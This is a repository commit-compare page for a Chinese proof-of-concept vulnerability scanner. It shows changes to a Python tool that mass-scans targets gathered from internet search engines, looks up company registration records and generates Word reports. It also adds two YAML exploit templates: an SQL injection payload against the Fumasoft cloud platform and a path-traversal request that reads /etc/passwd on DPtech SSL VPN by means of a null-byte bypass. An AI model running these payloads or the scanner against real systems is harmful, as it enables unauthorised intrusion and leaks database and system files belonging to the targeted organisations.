MasonLiu/Poc_Scanner
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: MasonLiu:1.1.1版本
Branches Tags
MasonLiu:main
MasonLiu:1.1.1版本
MasonLiu:1.1.0版本
...
compare: MasonLiu:main
Branches Tags
MasonLiu:main
MasonLiu:1.1.1版本
MasonLiu:1.1.0版本

11 Commits
1.1.1版本 ... main

Author SHA1 Message Date
MasonLiu
182186a0cf 更新 README.md 2024-10-14 16:50:51 +08:00
MasonLiu
ce90acdb64 更新优化 2024-10-14 16:48:04 +08:00
MasonLiu
73647db414 优化 2024-10-12 13:35:03 +08:00
MasonLiu
2b6d13a590 更新计划 2024-10-11 18:19:53 +08:00
MasonLiu
3bfb52d5dc 更新备案API 2024-10-11 17:54:44 +08:00
MasonLiu
6c96f50806 更新模板 2024-10-10 16:38:14 +08:00
MasonLiu
e1a9f6bd44 更新模板 2024-10-10 16:36:43 +08:00
MasonLiu
4cdf73b69b 更新模板 2024-10-10 16:34:31 +08:00
MasonLiu
c03f7c25a9 revert 8c5243bf7c 
revert 删除 file/模板.docx
 2024-10-10 16:23:20 +08:00
MasonLiu
8c5243bf7c 删除 file/模板.docx 2024-10-10 16:22:13 +08:00
MasonLiu
d73c6d3ef0 更改 2024-10-09 15:30:14 +08:00
6 changed files with 135 additions and 29 deletions
Show Stats Expand all files Collapse all files

11
ChangeLogs.md
View File

@ -2,14 +2,18 @@
2024/8/1
```
1.更改了扫描逻辑,使其在不存在第二链接检测时直接获取请求包的响应信息,减少资源浪费并提高了识别准确率。
2.为扫描器添加了默认模式,使用参数 --batch 即可启用
2.为扫描器添加了默认模式,使用参数 --batch 即可启用。
```
2024/10/11
```
1.优化了程序扫描逻辑,可以选择是否探测存活。
2.替换了公司名称获取API节点。
```
### 已知问题
- 截图程序无法调用yaml包中参数可能导致截图内容错误
- ICP截图站点站长工具现已无法使用
@ -18,6 +22,7 @@
- 截图逻辑需要更改,使其支持对下载类漏洞的检测截图且截图需截入链接
- 漏洞扫描框架有待优化,需添加多线程以及更多可以优化性能的模块
- 漏洞扫描框架需要添加对无回显类漏洞的扫描支持以及截图证明方法
- 结果截图需要完善以支持对POST请求的网页进行截图

5
README.md
View File

@ -5,5 +5,10 @@
- POC示例模板在poc文件夹下请根据此来更改
- 本扫描器暂不支持时间检测和无回显检测。
运行方法:
1. 先在MatchedPOC.txt中填入需要扫描的poc路径可一次填入多个使用相对路径
2. 在urls.txt填入需要扫描的目标可以从fofahunter等获取
3. 运行命令python new_poc_tools.py随后按照提示输入参数。
4. 在file文件夹下即可获取生成文档
!新版本指南后续更新。

BIN
file/模板.docx
View File

Binary file not shown.

89
new_poc_tools.py
View File

@ -7,6 +7,7 @@ import urllib.parse
import sys
import docx
import os
import re
import warnings
import requests
import argparse
@ -48,11 +49,15 @@ def get_company_name(url):
soup = BeautifulSoup(response.content, 'html.parser')
# 查找公司名称的<a>标签
company_name_tag = soup.find('a', id='companyName')
company_name_tag = soup.find('div', {'tag': 'company_name'})
# 提取公司名称
if company_name_tag:
return company_name_tag.text
text = company_name_tag.text
cleaned_text = re.sub(r'[^\w\s]', '', text) # 去除英文符号
cleaned_text = re.sub(r'\s+', ' ', cleaned_text).strip() # 去除多余空格和换行符
return cleaned_text
# return company_name_tag.text
else:
print("公司名称未找到")
return None
@ -100,24 +105,28 @@ def create_document():
def extract_root_domain(url):
extracted = tldextract.extract(url)
root_domain = f"{extracted.domain}.{extracted.suffix}"
encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
encoded_str = encoded_bytes.decode('utf-8')
return urllib.parse.quote(encoded_str)
# encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
# encoded_str = encoded_bytes.decode('utf-8')
return urllib.parse.quote(root_domain)
def add_scan_results_to_document(document, domain, results, include_all, description, choice_3):
for name, result, status_code, url, res_time in results:
if include_all or result == "存在漏洞":
company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
document.add_heading(f"目标:{domain}", level=3)
document.add_paragraph(f"漏洞名称:{name}")
document.add_paragraph(f"公司名称:{company_name}")
document.add_paragraph(f"漏洞链接:{url}")
document.add_paragraph(f"响应状态{status_code}")
document.add_paragraph(f"响应状态{status_code}")
document.add_paragraph(f"响应时间:{res_time}")
document.add_paragraph(f"漏洞情况:{result}")
document.add_paragraph("\n")
if result == "存在漏洞" and choice_3 == "y":
screenshot_path_1 = screenshot(url)
# print(screenshot_path_1)
screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
# 站长工具反爬,该截图路径已废弃
# screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
# print(screenshot_path_2)
#word处理部分
#导入模板
@ -136,35 +145,56 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
run = paragraph.add_run()
if screenshot_path_1:
run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13)) #添加图片
run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加图片
# run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加ICP备案图片已废弃寻找新方法
doc_save_path = './file/result/'
if not os.path.exists(doc_save_path):
os.mkdir(doc_save_path)
#保存word根据需要自行更改
company_name = get_company_name("https://icp.chinaz.com/" + domain)
doc_name = str(company_name) + "_" + name + ".docx"
doc.save(doc_save_path + doc_name)
def mass_poc_scan(domains, include_all, choice_2, docx_name):
def mass_poc_scan(domains, include_all, choice_2, docx_name, status):
document = create_document()
current_domain = None # 用于记录当前正在扫描的域名
try:
for domain in domains:
logging.info(f"正在扫描域名:{domain}")
if not check_url_status(domain):
logging.warning(f"访问失败,跳过当前域名的扫描:{domain}")
print("--------------------------------------------------")
if choice_2.lower() == 'n':
document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3
continue
current_domain = domain # 记录当前正在扫描的域名
if status == 'y':
if not check_url_status(domain):
logging.warning(f"访问失败,跳过当前域名的扫描:{domain}")
print("--------------------------------------------------")
if choice_2.lower() == 'y':
document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3
continue
try:
results, description = validate_main(domain)
add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
except Exception as e:
logging.error(f"扫描域名 {domain} 时出错:{e}")
print("--------------------------------------------------")
try:
results, description = validate_main(domain)
add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
except Exception as e:
logging.error(f"扫描域名 {domain} 时出错:{e}")
print("--------------------------------------------------")
else:
try:
results, description = validate_main(domain)
add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
except Exception as e:
logging.error(f"扫描域名 {domain} 时出错:{e}")
print("--------------------------------------------------")
except KeyboardInterrupt:
print(Fore.RED +'\n检测到Ctrl+C中断程序。' + Fore.RESET)
print(Fore.RED + '\n检测到Ctrl+C中断程序')
if current_domain is not None:
print(f"当前正在扫描的域名为:{current_domain}")
else:
print("暂未开始扫描计划。")
print(Fore.RESET)
save_document(document, docx_name)
def save_document(document, docx_name):
@ -191,6 +221,7 @@ if __name__ == "__main__":
file_path = "./urls.txt"
include_all = False
choice_3 = 'y'
status = 'y'
else:
# 交互模式
choice = input(Fore.BLUE + "请问是否需要输入其他目标文件?(y/n): " + Fore.RESET).lower()
@ -203,6 +234,8 @@ if __name__ == "__main__":
print("--------------------------------------------------")
domains = extract_domains_from_file(file_path)
status = input(Fore.BLUE + "请问是否需要检查目标网站存活状态?(y/n): " + Fore.RESET).lower()
print("--------------------------------------------------")
choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录?(y/n): " + Fore.RESET).lower()
include_all = choice_2 != 'y'
print("--------------------------------------------------")
@ -212,9 +245,13 @@ if __name__ == "__main__":
# 执行扫描
domains = extract_domains_from_file(file_path)
if args.batch:
mass_poc_scan(domains, include_all, choice_3, args.name)
mass_poc_scan(domains, include_all, choice_3, args.name, status)
else:
docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤)" + Fore.RESET)
print("--------------------------------------------------")
mass_poc_scan(domains, include_all, choice_3, docx_name)
mass_poc_scan(domains, include_all, choice_3, docx_name, status)
# if __name__ == "__main__":
# domain = 'http://vr.sh-fit.com:9090'
# company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
# print(company_name)

30
poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml Normal file
View File

@ -0,0 +1,30 @@
keyword: fumasoft
name: 孚盟云平台存在SQL注入漏洞
description: | # 下一行可填写漏洞描述
孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞。
requests: # 为空代表默认或者不启用
path: "/m/Dingding/Ajax/AjaxSendDingdingMessage.ashx"
method: POST
headers:
Accept: '*/*'
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Referer: https://www.baidu.com
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
body-raw: |- # 如果需要发送请求体,在下一行开始填写
action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 200
body: "Copyright" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞可能导致数据库敏感信息泄露。

29
poc/SE-Poc/DPsslvpn-ReadFile.yaml Normal file
View File

@ -0,0 +1,29 @@
keyword: DPtech SSLVPN
name: 迪普SSL VPN 任意文件读取
description: | # 下一行可填写漏洞描述
迪普SSL VPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制读取系统重要文件如数据库配置文件、系统配置文件、数据库配置文件等等导致网站处于极度不安全状态。
requests: # 为空代表默认或者不启用
path: "/.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd"
method: GET
headers:
Accept: '*/*'
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Referer: https://www.baidu.com
Accept-Encoding: gzip, deflate
Connection: keep-alive
body-raw: |- # 如果需要发送请求体,在下一行开始填写
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 200
body: "root" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
迪普SSL VPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制读取系统重要文件如数据库配置文件、系统配置文件、数据库配置文件等等导致网站处于极度不安全状态。